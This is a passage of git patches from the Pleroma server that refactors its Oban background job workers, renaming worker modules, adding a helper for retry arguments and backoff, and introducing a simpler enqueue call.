index ffc48bfab..4ab2a4ef4 100644
--- a/lib/pleroma/digest_email_worker.ex
+++ b/lib/pleroma/digest_email_worker.ex
@@ -4,11 +4,11 @@
defmodule Pleroma.DigestEmailWorker do
alias Pleroma.Repo
- alias Pleroma.Workers.Mailer, as: MailerWorker
+ alias Pleroma.Workers.MailerWorker
import Ecto.Query
- defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+ import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
def perform do
config = Pleroma.Config.get([:email_notifications, :digest])
diff --git a/lib/pleroma/emails/mailer.ex b/lib/pleroma/emails/mailer.ex
index bb534f602..9cbe7313c 100644
--- a/lib/pleroma/emails/mailer.ex
+++ b/lib/pleroma/emails/mailer.ex
@@ -10,7 +10,7 @@ defmodule Pleroma.Emails.Mailer do
"""
alias Pleroma.Repo
- alias Pleroma.Workers.Mailer, as: MailerWorker
+ alias Pleroma.Workers.MailerWorker
alias Swoosh.DeliveryError
@otp_app :pleroma
@@ -19,7 +19,7 @@ defmodule Pleroma.Emails.Mailer do
@spec enabled?() :: boolean()
def enabled?, do: Pleroma.Config.get([__MODULE__, :enabled])
- defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+ import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
@doc "add email to queue"
def deliver_async(email, config \\ []) do
diff --git a/lib/pleroma/scheduled_activity_worker.ex b/lib/pleroma/scheduled_activity_worker.ex
index a01fb4fcb..8bf534f42 100644
--- a/lib/pleroma/scheduled_activity_worker.ex
+++ b/lib/pleroma/scheduled_activity_worker.ex
@@ -18,7 +18,7 @@ defmodule Pleroma.ScheduledActivityWorker do
@schedule_interval :timer.minutes(1)
- defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+ import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
def start_link(_) do
GenServer.start_link(__MODULE__, nil)
diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
index 18bba0fbb..abfa063fb 100644
--- a/lib/pleroma/user.ex
+++ b/lib/pleroma/user.ex
@@ -41,7 +41,7 @@ defmodule Pleroma.User do
@strict_local_nickname_regex ~r/^[a-zA-Z\d]+$/
@extended_local_nickname_regex ~r/^[a-zA-Z\d_-]+$/
- defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+ import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
schema "users" do
field(:bio, :string)
diff --git a/lib/pleroma/web/activity_pub/activity_pub.ex b/lib/pleroma/web/activity_pub/activity_pub.ex
index 50279cca5..74c5eb91c 100644
--- a/lib/pleroma/web/activity_pub/activity_pub.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub.ex
@@ -26,7 +26,7 @@ defmodule Pleroma.Web.ActivityPub.ActivityPub do
require Logger
require Pleroma.Constants
- defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+ import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
# For Announce activities, we filter the recipients based on following status for any actors
# that match actual users. See issue #164 for more information about why this is necessary.
diff --git a/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex b/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex
index b188164ee..178321558 100644
--- a/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex
+++ b/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex
@@ -18,7 +18,7 @@ defmodule Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy do
recv_timeout: 10_000
]
- defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+ import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
def perform(:prefetch, url) do
Logger.info("Prefetching #{inspect(url)}")
diff --git a/lib/pleroma/web/activity_pub/publisher.ex b/lib/pleroma/web/activity_pub/publisher.ex
index 24d101dc8..a6322e25a 100644
--- a/lib/pleroma/web/activity_pub/publisher.ex
+++ b/lib/pleroma/web/activity_pub/publisher.ex
@@ -85,7 +85,7 @@ def publish_one(%{inbox: inbox, json: json, actor: %User{} = actor, id: id} = pa
end
def publish_one(%{actor_id: actor_id} = params) do
- actor = User.get_by_id(actor_id)
+ actor = User.get_cached_by_id(actor_id)
params
|> Map.delete(:actor_id)
diff --git a/lib/pleroma/web/activity_pub/transmogrifier.ex b/lib/pleroma/web/activity_pub/transmogrifier.ex
index b068d28a7..9437f9a16 100644
--- a/lib/pleroma/web/activity_pub/transmogrifier.ex
+++ b/lib/pleroma/web/activity_pub/transmogrifier.ex
@@ -15,14 +15,14 @@ defmodule Pleroma.Web.ActivityPub.Transmogrifier do
alias Pleroma.Web.ActivityPub.Utils
alias Pleroma.Web.ActivityPub.Visibility
alias Pleroma.Web.Federator
- alias Pleroma.Workers.Transmogrifier, as: TransmogrifierWorker
+ alias Pleroma.Workers.TransmogrifierWorker
import Ecto.Query
require Logger
require Pleroma.Constants
- defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+ import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
@doc """
Modifies an incoming AP object (mastodon format) to our internal format.
diff --git a/lib/pleroma/web/federator/federator.ex b/lib/pleroma/web/federator/federator.ex
index cf7e50fee..8f43066e3 100644
--- a/lib/pleroma/web/federator/federator.ex
+++ b/lib/pleroma/web/federator/federator.ex
@@ -12,13 +12,13 @@ defmodule Pleroma.Web.Federator do
alias Pleroma.Web.Federator.Publisher
alias Pleroma.Web.OStatus
alias Pleroma.Web.Websub
- alias Pleroma.Workers.Publisher, as: PublisherWorker
- alias Pleroma.Workers.Receiver, as: ReceiverWorker
- alias Pleroma.Workers.Subscriber, as: SubscriberWorker
+ alias Pleroma.Workers.PublisherWorker
+ alias Pleroma.Workers.ReceiverWorker
+ alias Pleroma.Workers.SubscriberWorker
require Logger
- defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+ import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
def init do
# To do: consider removing this call in favor of scheduled execution (`quantum`-based)
diff --git a/lib/pleroma/web/federator/publisher.ex b/lib/pleroma/web/federator/publisher.ex
index 05d2be615..42be109ab 100644
--- a/lib/pleroma/web/federator/publisher.ex
+++ b/lib/pleroma/web/federator/publisher.ex
@@ -6,7 +6,7 @@ defmodule Pleroma.Web.Federator.Publisher do
alias Pleroma.Activity
alias Pleroma.Config
alias Pleroma.User
- alias Pleroma.Workers.Publisher, as: PublisherWorker
+ alias Pleroma.Workers.PublisherWorker
require Logger
@@ -31,12 +31,7 @@ defmodule Pleroma.Web.Federator.Publisher do
"""
@spec enqueue_one(module(), Map.t()) :: :ok
def enqueue_one(module, %{} = params) do
- worker_args =
- if max_attempts = Pleroma.Config.get([:workers, :retries, :federator_outgoing]) do
- [max_attempts: max_attempts]
- else
- []
- end
+ worker_args = Pleroma.Workers.WorkerHelper.worker_args(:federator_outgoing)
%{"op" => "publish_one", "module" => to_string(module), "params" => params}
|> PublisherWorker.new(worker_args)
diff --git a/lib/pleroma/web/oauth/token/clean_worker.ex b/lib/pleroma/web/oauth/token/clean_worker.ex
index 943e73289..b150a68a7 100644
--- a/lib/pleroma/web/oauth/token/clean_worker.ex
+++ b/lib/pleroma/web/oauth/token/clean_worker.ex
@@ -20,7 +20,7 @@ defmodule Pleroma.Web.OAuth.Token.CleanWorker do
alias Pleroma.Web.OAuth.Token
alias Pleroma.Workers.BackgroundWorker
- defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+ import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
def start_link(_), do: GenServer.start_link(__MODULE__, %{})
diff --git a/lib/pleroma/web/push/push.ex b/lib/pleroma/web/push/push.ex
index b4f0e5127..4973b529c 100644
--- a/lib/pleroma/web/push/push.ex
+++ b/lib/pleroma/web/push/push.ex
@@ -4,11 +4,11 @@
defmodule Pleroma.Web.Push do
alias Pleroma.Repo
- alias Pleroma.Workers.WebPusher
+ alias Pleroma.Workers.WebPusherWorker
require Logger
- defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+ import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
def init do
unless enabled() do
@@ -36,7 +36,7 @@ def enabled do
def send(notification) do
%{"op" => "web_push", "notification_id" => notification.id}
- |> WebPusher.new(worker_args(:web_push))
+ |> WebPusherWorker.new(worker_args(:web_push))
|> Repo.insert()
end
end
diff --git a/lib/pleroma/web/salmon/salmon.ex b/lib/pleroma/web/salmon/salmon.ex
index bbaa293fd..8ba7380c0 100644
--- a/lib/pleroma/web/salmon/salmon.ex
+++ b/lib/pleroma/web/salmon/salmon.ex
@@ -171,7 +171,7 @@ def publish_one(%{recipient: url, feed: feed} = params) when is_binary(url) do
end
def publish_one(%{recipient_id: recipient_id} = params) do
- recipient = User.get_by_id(recipient_id)
+ recipient = User.get_cached_by_id(recipient_id)
params
|> Map.delete(:recipient_id)
diff --git a/lib/pleroma/workers/activity_expiration_worker.ex b/lib/pleroma/workers/activity_expiration_worker.ex
new file mode 100644
index 000000000..0b491eabb
--- /dev/null
+++ b/lib/pleroma/workers/activity_expiration_worker.ex
@@ -0,0 +1,21 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.ActivityExpirationWorker do
+ # Note: `max_attempts` is intended to be overridden in `new/2` call
+ use Oban.Worker,
+ queue: "activity_expiration",
+ max_attempts: 1
+
+ @impl Oban.Worker
+ def perform(
+ %{
+ "op" => "activity_expiration",
+ "activity_expiration_id" => activity_expiration_id
+ },
+ _job
+ ) do
+ Pleroma.ActivityExpirationWorker.perform(:execute, activity_expiration_id)
+ end
+end
diff --git a/lib/pleroma/workers/background_worker.ex b/lib/pleroma/workers/background_worker.ex
index fbce7d789..7b5575a5f 100644
--- a/lib/pleroma/workers/background_worker.ex
+++ b/lib/pleroma/workers/background_worker.ex
@@ -8,24 +8,24 @@ defmodule Pleroma.Workers.BackgroundWorker do
alias Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy
alias Pleroma.Web.OAuth.Token.CleanWorker
- # Note: `max_attempts` is intended to be overridden in `new/1` call
+ # Note: `max_attempts` is intended to be overridden in `new/2` call
use Oban.Worker,
queue: "background",
max_attempts: 1
@impl Oban.Worker
def perform(%{"op" => "fetch_initial_posts", "user_id" => user_id}, _job) do
- user = User.get_by_id(user_id)
+ user = User.get_cached_by_id(user_id)
User.perform(:fetch_initial_posts, user)
end
def perform(%{"op" => "deactivate_user", "user_id" => user_id, "status" => status}, _job) do
- user = User.get_by_id(user_id)
+ user = User.get_cached_by_id(user_id)
User.perform(:deactivate_async, user, status)
end
def perform(%{"op" => "delete_user", "user_id" => user_id}, _job) do
- user = User.get_by_id(user_id)
+ user = User.get_cached_by_id(user_id)
User.perform(:delete, user)
end
@@ -37,7 +37,7 @@ def perform(
},
_job
) do
- blocker = User.get_by_id(blocker_id)
+ blocker = User.get_cached_by_id(blocker_id)
User.perform(:blocks_import, blocker, blocked_identifiers)
end
@@ -49,7 +49,7 @@ def perform(
},
_job
) do
- follower = User.get_by_id(follower_id)
+ follower = User.get_cached_by_id(follower_id)
User.perform(:follow_import, follower, followed_identifiers)
end
@@ -69,11 +69,4 @@ def perform(%{"op" => "fetch_data_for_activity", "activity_id" => activity_id},
activity = Activity.get_by_id(activity_id)
Pleroma.Web.RichMedia.Helpers.perform(:fetch, activity)
end
-
- def perform(
- %{"op" => "activity_expiration", "activity_expiration_id" => activity_expiration_id},
- _job
- ) do
- Pleroma.ActivityExpirationWorker.perform(:execute, activity_expiration_id)
- end
end
diff --git a/lib/pleroma/workers/helper.ex b/lib/pleroma/workers/helper.ex
deleted file mode 100644
index 3286ce0e8..000000000
--- a/lib/pleroma/workers/helper.ex
+++ /dev/null
@@ -1,13 +0,0 @@
-# Pleroma: A lightweight social networking server
-# Copyright © 2017-2019 Pleroma Authors
-# SPDX-License-Identifier: AGPL-3.0-only
-
-defmodule Pleroma.Workers.Helper do
- def worker_args(queue) do
- if max_attempts = Pleroma.Config.get([:workers, :retries, queue]) do
- [max_attempts: max_attempts]
- else
- []
- end
- end
-end
diff --git a/lib/pleroma/workers/mailer.ex b/lib/pleroma/workers/mailer_worker.ex
similarity index 58%
rename from lib/pleroma/workers/mailer.ex
rename to lib/pleroma/workers/mailer_worker.ex
index 1cce2ea03..4f73d61bc 100644
--- a/lib/pleroma/workers/mailer.ex
+++ b/lib/pleroma/workers/mailer_worker.ex
@@ -2,26 +2,25 @@
# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.Workers.Mailer do
+defmodule Pleroma.Workers.MailerWorker do
alias Pleroma.User
- # Note: `max_attempts` is intended to be overridden in `new/1` call
+ # Note: `max_attempts` is intended to be overridden in `new/2` call
use Oban.Worker,
queue: "mailer",
max_attempts: 1
@impl Oban.Worker
def perform(%{"op" => "email", "encoded_email" => encoded_email, "config" => config}, _job) do
- email =
- encoded_email
- |> Base.decode64!()
- |> :erlang.binary_to_term()
-
- Pleroma.Emails.Mailer.deliver(email, config)
+ encoded_email
+ |> Base.decode64!()
+ |> :erlang.binary_to_term()
+ |> Pleroma.Emails.Mailer.deliver(config)
end
def perform(%{"op" => "digest_email", "user_id" => user_id}, _job) do
- user = User.get_by_id(user_id)
- Pleroma.DigestEmailWorker.perform(user)
+ user_id
+ |> User.get_cached_by_id()
+ |> Pleroma.DigestEmailWorker.perform()
end
end
diff --git a/lib/pleroma/workers/publisher.ex b/lib/pleroma/workers/publisher_worker.ex
similarity index 76%
rename from lib/pleroma/workers/publisher.ex
rename to lib/pleroma/workers/publisher_worker.ex
index 00fae99c7..5671d2a29 100644
--- a/lib/pleroma/workers/publisher.ex
+++ b/lib/pleroma/workers/publisher_worker.ex
@@ -2,15 +2,19 @@
# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.Workers.Publisher do
+defmodule Pleroma.Workers.PublisherWorker do
alias Pleroma.Activity
alias Pleroma.Web.Federator
- # Note: `max_attempts` is intended to be overridden in `new/1` call
+ # Note: `max_attempts` is intended to be overridden in `new/2` call
use Oban.Worker,
queue: "federator_outgoing",
max_attempts: 1
+ def backoff(attempt) when is_integer(attempt) do
+ Pleroma.Workers.WorkerHelper.sidekiq_backoff(attempt, 5)
+ end
+
@impl Oban.Worker
def perform(%{"op" => "publish", "activity_id" => activity_id}, _job) do
activity = Activity.get_by_id(activity_id)
diff --git a/lib/pleroma/workers/receiver.ex b/lib/pleroma/workers/receiver_worker.ex
similarity index 83%
rename from lib/pleroma/workers/receiver.ex
rename to lib/pleroma/workers/receiver_worker.ex
index 4ee270d74..cdce630f2 100644
--- a/lib/pleroma/workers/receiver.ex
+++ b/lib/pleroma/workers/receiver_worker.ex
@@ -2,10 +2,10 @@
# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.Workers.Receiver do
+defmodule Pleroma.Workers.ReceiverWorker do
alias Pleroma.Web.Federator
- # Note: `max_attempts` is intended to be overridden in `new/1` call
+ # Note: `max_attempts` is intended to be overridden in `new/2` call
use Oban.Worker,
queue: "federator_incoming",
max_attempts: 1
diff --git a/lib/pleroma/workers/scheduled_activity_worker.ex b/lib/pleroma/workers/scheduled_activity_worker.ex
index d9724c78a..4094411ae 100644
--- a/lib/pleroma/workers/scheduled_activity_worker.ex
+++ b/lib/pleroma/workers/scheduled_activity_worker.ex
@@ -3,7 +3,7 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Workers.ScheduledActivityWorker do
- # Note: `max_attempts` is intended to be overridden in `new/1` call
+ # Note: `max_attempts` is intended to be overridden in `new/2` call
use Oban.Worker,
queue: "scheduled_activities",
max_attempts: 1
diff --git a/lib/pleroma/workers/subscriber.ex b/lib/pleroma/workers/subscriber_worker.ex
similarity index 88%
rename from lib/pleroma/workers/subscriber.ex
rename to lib/pleroma/workers/subscriber_worker.ex
index e960b35bf..22d1dc956 100644
--- a/lib/pleroma/workers/subscriber.ex
+++ b/lib/pleroma/workers/subscriber_worker.ex
@@ -2,12 +2,12 @@
# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.Workers.Subscriber do
+defmodule Pleroma.Workers.SubscriberWorker do
alias Pleroma.Repo
alias Pleroma.Web.Federator
alias Pleroma.Web.Websub
- # Note: `max_attempts` is intended to be overridden in `new/1` call
+ # Note: `max_attempts` is intended to be overridden in `new/2` call
use Oban.Worker,
queue: "federator_outgoing",
max_attempts: 1
diff --git a/lib/pleroma/workers/transmogrifier.ex b/lib/pleroma/workers/transmogrifier_worker.ex
similarity index 73%
rename from lib/pleroma/workers/transmogrifier.ex
rename to lib/pleroma/workers/transmogrifier_worker.ex
index e13202c06..6f5c1a2f2 100644
--- a/lib/pleroma/workers/transmogrifier.ex
+++ b/lib/pleroma/workers/transmogrifier_worker.ex
@@ -2,17 +2,17 @@
# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.Workers.Transmogrifier do
+defmodule Pleroma.Workers.TransmogrifierWorker do
alias Pleroma.User
- # Note: `max_attempts` is intended to be overridden in `new/1` call
+ # Note: `max_attempts` is intended to be overridden in `new/2` call
use Oban.Worker,
queue: "transmogrifier",
max_attempts: 1
@impl Oban.Worker
def perform(%{"op" => "user_upgrade", "user_id" => user_id}, _job) do
- user = User.get_by_id(user_id)
+ user = User.get_cached_by_id(user_id)
Pleroma.Web.ActivityPub.Transmogrifier.perform(:user_upgrade, user)
end
end
diff --git a/lib/pleroma/workers/web_pusher.ex b/lib/pleroma/workers/web_pusher_worker.ex
similarity index 82%
rename from lib/pleroma/workers/web_pusher.ex
rename to lib/pleroma/workers/web_pusher_worker.ex
index 7b78bb3ea..2b1d3b99a 100644
--- a/lib/pleroma/workers/web_pusher.ex
+++ b/lib/pleroma/workers/web_pusher_worker.ex
@@ -2,11 +2,11 @@
# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.Workers.WebPusher do
+defmodule Pleroma.Workers.WebPusherWorker do
alias Pleroma.Notification
alias Pleroma.Repo
- # Note: `max_attempts` is intended to be overridden in `new/1` call
+ # Note: `max_attempts` is intended to be overridden in `new/2` call
use Oban.Worker,
queue: "web_push",
max_attempts: 1
diff --git a/lib/pleroma/workers/worker_helper.ex b/lib/pleroma/workers/worker_helper.ex
new file mode 100644
index 000000000..f9ed2e64d
--- /dev/null
+++ b/lib/pleroma/workers/worker_helper.ex
@@ -0,0 +1,23 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.WorkerHelper do
+ alias Pleroma.Config
+
+ def worker_args(queue) do
+ case Config.get([:workers, :retries, queue]) do
+ nil -> []
+ max_attempts -> [max_attempts: max_attempts]
+ end
+ end
+
+ def sidekiq_backoff(attempt, pow \\ 4, base_backoff \\ 15) do
+ backoff =
+ :math.pow(attempt, pow) +
+ base_backoff +
+ :rand.uniform(2 * base_backoff) * attempt
+
+ trunc(backoff)
+ end
+end
diff --git a/test/user_test.exs b/test/user_test.exs
index 86232de99..0acd0db4e 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -1123,7 +1123,7 @@ test "it deletes a user, all follow relationships and all activities", %{user: u
"id" => "pleroma:fakeid"
}
},
- all_enqueued(worker: Pleroma.Workers.Publisher)
+ all_enqueued(worker: Pleroma.Workers.PublisherWorker)
)
end
end
diff --git a/test/web/activity_pub/activity_pub_controller_test.exs b/test/web/activity_pub/activity_pub_controller_test.exs
index a1b567a46..f1c1bb503 100644
--- a/test/web/activity_pub/activity_pub_controller_test.exs
+++ b/test/web/activity_pub/activity_pub_controller_test.exs
@@ -17,7 +17,7 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do
alias Pleroma.Web.ActivityPub.UserView
alias Pleroma.Web.ActivityPub.Utils
alias Pleroma.Web.CommonAPI
- alias Pleroma.Workers.Receiver, as: ReceiverWorker
+ alias Pleroma.Workers.ReceiverWorker
setup_all do
Tesla.Mock.mock_global(fn env -> apply(HttpRequestMock, :request, [env]) end)
diff --git a/test/web/federator_test.exs b/test/web/federator_test.exs
index 5724672fd..4096d4690 100644
--- a/test/web/federator_test.exs
+++ b/test/web/federator_test.exs
@@ -7,7 +7,7 @@ defmodule Pleroma.Web.FederatorTest do
alias Pleroma.Tests.ObanHelpers
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.Federator
- alias Pleroma.Workers.Publisher, as: PublisherWorker
+ alias Pleroma.Workers.PublisherWorker
use Pleroma.DataCase
use Oban.Testing, repo: Pleroma.Repo
diff --git a/test/web/websub/websub_test.exs b/test/web/websub/websub_test.exs
index 414610879..929acf5a2 100644
--- a/test/web/websub/websub_test.exs
+++ b/test/web/websub/websub_test.exs
@@ -11,7 +11,7 @@ defmodule Pleroma.Web.WebsubTest do
alias Pleroma.Web.Websub
alias Pleroma.Web.Websub.WebsubClientSubscription
alias Pleroma.Web.Websub.WebsubServerSubscription
- alias Pleroma.Workers.Subscriber, as: SubscriberWorker
+ alias Pleroma.Workers.SubscriberWorker
import Pleroma.Factory
import Tesla.Mock
From dd017c65a4b86501c435f5cb01804300e6b7c6dd Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Sat, 31 Aug 2019 21:58:42 +0300
Subject: [PATCH 023/272] [#1149] Refactored Oban workers API (introduced
`enqueue/3`).
---
lib/pleroma/activity_expiration_worker.ex | 13 +++------
lib/pleroma/digest_email_worker.ex | 10 ++-----
lib/pleroma/emails/mailer.ex | 7 +----
lib/pleroma/scheduled_activity_worker.ex | 10 +++----
lib/pleroma/user.ex | 28 +++++--------------
lib/pleroma/web/activity_pub/activity_pub.ex | 6 +---
.../mrf/mediaproxy_warming_policy.ex | 11 ++------
.../web/activity_pub/transmogrifier.ex | 6 +---
lib/pleroma/web/federator/federator.ex | 26 ++++-------------
lib/pleroma/web/federator/publisher.ex | 9 +++---
lib/pleroma/web/oauth/token/clean_worker.ex | 7 +----
lib/pleroma/web/push/push.ex | 7 +----
.../workers/activity_expiration_worker.ex | 2 ++
lib/pleroma/workers/background_worker.ex | 2 ++
lib/pleroma/workers/digest_emails_worker.ex | 21 ++++++++++++++
lib/pleroma/workers/mailer_worker.ex | 10 ++-----
lib/pleroma/workers/publisher_worker.ex | 2 ++
lib/pleroma/workers/receiver_worker.ex | 2 ++
.../workers/scheduled_activity_worker.ex | 2 ++
lib/pleroma/workers/subscriber_worker.ex | 2 ++
lib/pleroma/workers/transmogrifier_worker.ex | 2 ++
lib/pleroma/workers/web_pusher_worker.ex | 2 ++
lib/pleroma/workers/worker_helper.ex | 18 ++++++++++++
23 files changed, 92 insertions(+), 113 deletions(-)
create mode 100644 lib/pleroma/workers/digest_emails_worker.ex
diff --git a/lib/pleroma/activity_expiration_worker.ex b/lib/pleroma/activity_expiration_worker.ex
index 7aba7eece..c0820c202 100644
--- a/lib/pleroma/activity_expiration_worker.ex
+++ b/lib/pleroma/activity_expiration_worker.ex
@@ -9,14 +9,11 @@ defmodule Pleroma.ActivityExpirationWorker do
alias Pleroma.Repo
alias Pleroma.User
alias Pleroma.Web.CommonAPI
- alias Pleroma.Workers.ActivityExpirationWorker
require Logger
use GenServer
import Ecto.Query
- import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
-
@schedule_interval :timer.minutes(1)
def start_link(_) do
@@ -53,12 +50,10 @@ def perform(:execute, expiration_id) do
def handle_info(:perform, state) do
ActivityExpiration.due_expirations(@schedule_interval)
|> Enum.each(fn expiration ->
- %{
- "op" => "activity_expiration",
- "activity_expiration_id" => expiration.id
- }
- |> ActivityExpirationWorker.new(worker_args(:activity_expiration))
- |> Repo.insert()
+ Pleroma.Workers.ActivityExpirationWorker.enqueue(
+ "activity_expiration",
+ %{"activity_expiration_id" => expiration.id}
+ )
end)
schedule_next()
diff --git a/lib/pleroma/digest_email_worker.ex b/lib/pleroma/digest_email_worker.ex
index 4ab2a4ef4..5be7cf26b 100644
--- a/lib/pleroma/digest_email_worker.ex
+++ b/lib/pleroma/digest_email_worker.ex
@@ -4,12 +4,10 @@
defmodule Pleroma.DigestEmailWorker do
alias Pleroma.Repo
- alias Pleroma.Workers.MailerWorker
+ alias Pleroma.Workers.DigestEmailsWorker
import Ecto.Query
- import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
-
def perform do
config = Pleroma.Config.get([:email_notifications, :digest])
negative_interval = -Map.fetch!(config, :interval)
@@ -23,11 +21,9 @@ def perform do
where: u.last_digest_emailed_at < datetime_add(^now, ^negative_interval, "day"),
select: u
)
- |> Pleroma.Repo.all()
+ |> Repo.all()
|> Enum.each(fn user ->
- %{"op" => "digest_email", "user_id" => user.id}
- |> MailerWorker.new([queue: "digest_emails"] ++ worker_args(:digest_emails))
- |> Repo.insert()
+ DigestEmailsWorker.enqueue("digest_email", %{"user_id" => user.id})
end)
end
diff --git a/lib/pleroma/emails/mailer.ex b/lib/pleroma/emails/mailer.ex
index 9cbe7313c..eb96f2e8b 100644
--- a/lib/pleroma/emails/mailer.ex
+++ b/lib/pleroma/emails/mailer.ex
@@ -9,7 +9,6 @@ defmodule Pleroma.Emails.Mailer do
The module contains functions to delivery email using Swoosh.Mailer.
"""
- alias Pleroma.Repo
alias Pleroma.Workers.MailerWorker
alias Swoosh.DeliveryError
@@ -19,8 +18,6 @@ defmodule Pleroma.Emails.Mailer do
@spec enabled?() :: boolean()
def enabled?, do: Pleroma.Config.get([__MODULE__, :enabled])
- import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
-
@doc "add email to queue"
def deliver_async(email, config \\ []) do
encoded_email =
@@ -28,9 +25,7 @@ def deliver_async(email, config \\ []) do
|> :erlang.term_to_binary()
|> Base.encode64()
- %{"op" => "email", "encoded_email" => encoded_email, "config" => config}
- |> MailerWorker.new(worker_args(:mailer))
- |> Repo.insert()
+ MailerWorker.enqueue("email", %{"encoded_email" => encoded_email, "config" => config})
end
@doc "callback to perform send email from queue"
diff --git a/lib/pleroma/scheduled_activity_worker.ex b/lib/pleroma/scheduled_activity_worker.ex
index 8bf534f42..c41a542de 100644
--- a/lib/pleroma/scheduled_activity_worker.ex
+++ b/lib/pleroma/scheduled_activity_worker.ex
@@ -8,7 +8,6 @@ defmodule Pleroma.ScheduledActivityWorker do
"""
alias Pleroma.Config
- alias Pleroma.Repo
alias Pleroma.ScheduledActivity
alias Pleroma.User
alias Pleroma.Web.CommonAPI
@@ -18,8 +17,6 @@ defmodule Pleroma.ScheduledActivityWorker do
@schedule_interval :timer.minutes(1)
- import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
-
def start_link(_) do
GenServer.start_link(__MODULE__, nil)
end
@@ -49,9 +46,10 @@ def perform(:execute, scheduled_activity_id) do
def handle_info(:perform, state) do
ScheduledActivity.due_activities(@schedule_interval)
|> Enum.each(fn scheduled_activity ->
- %{"op" => "execute", "activity_id" => scheduled_activity.id}
- |> Pleroma.Workers.ScheduledActivityWorker.new(worker_args(:scheduled_activities))
- |> Repo.insert()
+ Pleroma.Workers.ScheduledActivityWorker.enqueue(
+ "execute",
+ %{"activity_id" => scheduled_activity.id}
+ )
end)
schedule_next()
diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
index abfa063fb..2fe7e1748 100644
--- a/lib/pleroma/user.ex
+++ b/lib/pleroma/user.ex
@@ -41,8 +41,6 @@ defmodule Pleroma.User do
@strict_local_nickname_regex ~r/^[a-zA-Z\d]+$/
@extended_local_nickname_regex ~r/^[a-zA-Z\d_-]+$/
- import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
-
schema "users" do
field(:bio, :string)
field(:email, :string)
@@ -623,9 +621,7 @@ def get_or_fetch_by_nickname(nickname) do
@doc "Fetch some posts when the user has just been federated with"
def fetch_initial_posts(user) do
- %{"op" => "fetch_initial_posts", "user_id" => user.id}
- |> BackgroundWorker.new(worker_args(:background))
- |> Repo.insert()
+ BackgroundWorker.enqueue("fetch_initial_posts", %{"user_id" => user.id})
end
@spec get_followers_query(User.t(), pos_integer() | nil) :: Ecto.Query.t()
@@ -1056,9 +1052,7 @@ def unblock_domain(user, domain) do
end
def deactivate_async(user, status \\ true) do
- %{"op" => "deactivate_user", "user_id" => user.id, "status" => status}
- |> BackgroundWorker.new(worker_args(:background))
- |> Repo.insert()
+ BackgroundWorker.enqueue("deactivate_user", %{"user_id" => user.id, "status" => status})
end
def deactivate(%User{} = user, status \\ true) do
@@ -1087,9 +1081,7 @@ def update_notification_settings(%User{} = user, settings \\ %{}) do
end
def delete(%User{} = user) do
- %{"op" => "delete_user", "user_id" => user.id}
- |> BackgroundWorker.new(worker_args(:background))
- |> Repo.insert()
+ BackgroundWorker.enqueue("delete_user", %{"user_id" => user.id})
end
@spec perform(atom(), User.t()) :: {:ok, User.t()}
@@ -1198,24 +1190,18 @@ def external_users(opts \\ []) do
end
def blocks_import(%User{} = blocker, blocked_identifiers) when is_list(blocked_identifiers) do
- %{
- "op" => "blocks_import",
+ BackgroundWorker.enqueue("blocks_import", %{
"blocker_id" => blocker.id,
"blocked_identifiers" => blocked_identifiers
- }
- |> BackgroundWorker.new(worker_args(:background))
- |> Repo.insert()
+ })
end
def follow_import(%User{} = follower, followed_identifiers)
when is_list(followed_identifiers) do
- %{
- "op" => "follow_import",
+ BackgroundWorker.enqueue("follow_import", %{
"follower_id" => follower.id,
"followed_identifiers" => followed_identifiers
- }
- |> BackgroundWorker.new(worker_args(:background))
- |> Repo.insert()
+ })
end
